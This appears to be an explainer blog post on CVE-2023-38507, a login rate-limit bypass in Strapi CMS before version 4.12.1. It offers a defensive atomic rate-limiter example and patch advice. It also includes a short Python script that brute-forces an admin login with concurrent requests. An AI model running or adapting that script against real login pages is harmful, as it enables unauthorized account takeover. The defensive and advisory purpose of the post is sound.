CVE-2023-38507: Strapi CMS Prior to Version 4.12.1 is Susceptible to Login Brute Force Attack Due to Rate Limit Bypass

Strapi is a leading open-source headless content management system (CMS). These systems allow for efficient organization, storage, and retrieval of digital content, making them essential tools for many businesses and web developers. However, a recent vulnerability has been discovered in Strapi versions prior to 4.12.1 that puts user data at risk.

Prior to version 4.12.1, Strapi's admin screen has a rate limit on the login function. This rate limit is intended to prevent brute force attacks, where attackers attempt to gain access by trying multiple passwords in rapid succession. Unfortunately, this login rate limit can be bypassed, leaving the system susceptible to brute force attacks and unauthorized logins.

The vulnerability has been assigned the CVE-2023-38507 identifier, and a fix has been implemented in Strapi version 4.12.1.

Exploit Details

The rate limit implemented in Strapi's admin screen is not properly enforced, and attackers can bypass this limitation by creating multiple requests with concurrent connections. This allows them to attempt unauthorized logins at a much faster pace than would be possible if the rate limit was correctly enforced.

The code snippet below demonstrates how this rate limit bypass can be achieved:

import requests
import threading

# Target Strapi URL and credentials
target_url = "https://target-strapi-site.com/admin/login"
user_email = "admin@example.com"
password_list = ["password1", "password2", "password3"]  # List of possible passwords

# Function to attempt login with a specific password
def login_attempt(password):
    payload = {
        "email": user_email,
        "password": password
    }
    response = requests.post(target_url, json=payload)

    if response.status_code == 200:
        print(f"[+] Password found: {password}")

# Use threading to create multiple concurrent requests
for password in password_list:
    t = threading.Thread(target=login_attempt, args=(password,))
    t.start()

This code snippet shows a Python script that creates concurrent login requests to a target Strapi site, effectively bypassing the rate limit and increasing the chances of a successful brute force attack.
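The defensive counterpart, as an added illustration that is not Strapi's code and not the fix shipped in 4.12.1: a login rate limiter that holds up against exactly the kind of concurrent requests described above. The names (LoginRateLimiter, FakeClock, hammer_concurrently), the budget of 5 attempts per 60 seconds, and the TEST-NET addresses are assumptions chosen for the example; Strapi itself runs on Node, but Python is used here to match the script on this page. The point the example makes is that the read of the attempt counter, the decision and the increment must happen atomically; a limiter that decides on a stale counter and records the attempt later lets many simultaneous requests all pass.

```python
import threading
import time


class FakeClock:
    """Constructed clock for deterministic demonstration; advance() moves time forward."""

    def __init__(self, start=1000.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class LoginRateLimiter:
    """Fixed-window limiter for login attempts, keyed on (client_ip, email).

    Illustrative code, not Strapi's implementation. Keying on the account as
    well as the address bounds the budget for a single account regardless of
    where the attempts come from. The check and the increment run under one
    lock so that N simultaneous requests cannot all observe "0 attempts".
    """

    def __init__(self, max_attempts=5, window_seconds=60, clock=time.monotonic):
        self.max_attempts = max_attempts
        self.window = window_seconds
        self.clock = clock
        self._lock = threading.Lock()
        self._buckets = {}  # (ip, email) -> (window_start, attempts)

    def allow(self, client_ip, email):
        """Return True if this attempt may proceed, False if the window is exhausted."""
        key = (client_ip, email.strip().lower())
        now = self.clock()
        with self._lock:  # check and increment are atomic with respect to other threads
            start, count = self._buckets.get(key, (now, 0))
            if now - start >= self.window:
                start, count = now, 0  # window expired: reset the budget
            if count >= self.max_attempts:
                self._buckets[key] = (start, count)
                return False
            self._buckets[key] = (start, count + 1)
            return True


def hammer_concurrently(limiter, n_threads, client_ip, email):
    """Release n_threads at the same instant against one (ip, email); return how many pass."""
    barrier = threading.Barrier(n_threads)
    results = []
    results_lock = threading.Lock()

    def worker():
        barrier.wait()  # every thread calls allow() at the same moment
        ok = limiter.allow(client_ip, email)
        with results_lock:
            results.append(ok)

    threads = [threading.Thread(target=worker) for _ in range(n_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)


if __name__ == "__main__":
    clock = FakeClock()
    limiter = LoginRateLimiter(max_attempts=5, window_seconds=60, clock=clock)
    # 50 simultaneous attempts against one account from one address: exactly 5 pass.
    print(hammer_concurrently(limiter, 50, "203.0.113.5", "admin@example.com"))
    clock.advance(60)
    print(limiter.allow("203.0.113.5", "admin@example.com"))  # window reset, allowed again
```

Run stand-alone, the script releases 50 threads at once and reports that exactly 5 attempts got through; advancing the constructed clock past the window restores the budget. In a real deployment the counter would live in shared storage (so that several application instances see the same count) and the limiter would be paired with failed-login alerting, since a rate limit only slows an attack it can see.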

Strapi's Response and Patch

Before the issue of CVE-2023-38507 was publicized, Strapi acknowledged the vulnerability and swiftly provided a fix in version 4.12.1. Users of Strapi are advised to update their systems to the latest version in order to prevent potential unauthorized logins through brute force attacks.

The relevant commit details for the fix can be found here.

References

1. _Strapi_: Official website
2. _CVE Details_: CVE-2023-38507
3. _GitHub_: Strapi repository
4. _GitHub Commit_: Rate limit bypass fix

Conclusion

Although Strapi is a popular and powerful headless content management system, it remains vulnerable to attacks if users aren't diligent about maintaining updated versions. By updating Strapi to version 4.12.1 or later, users can ensure their systems are no longer susceptible to login brute force attacks via rate limit bypasses.

Timeline

Published on: 09/15/2023 20:15:00 UTC
Last modified on: 09/21/2023 14:09:00 UTC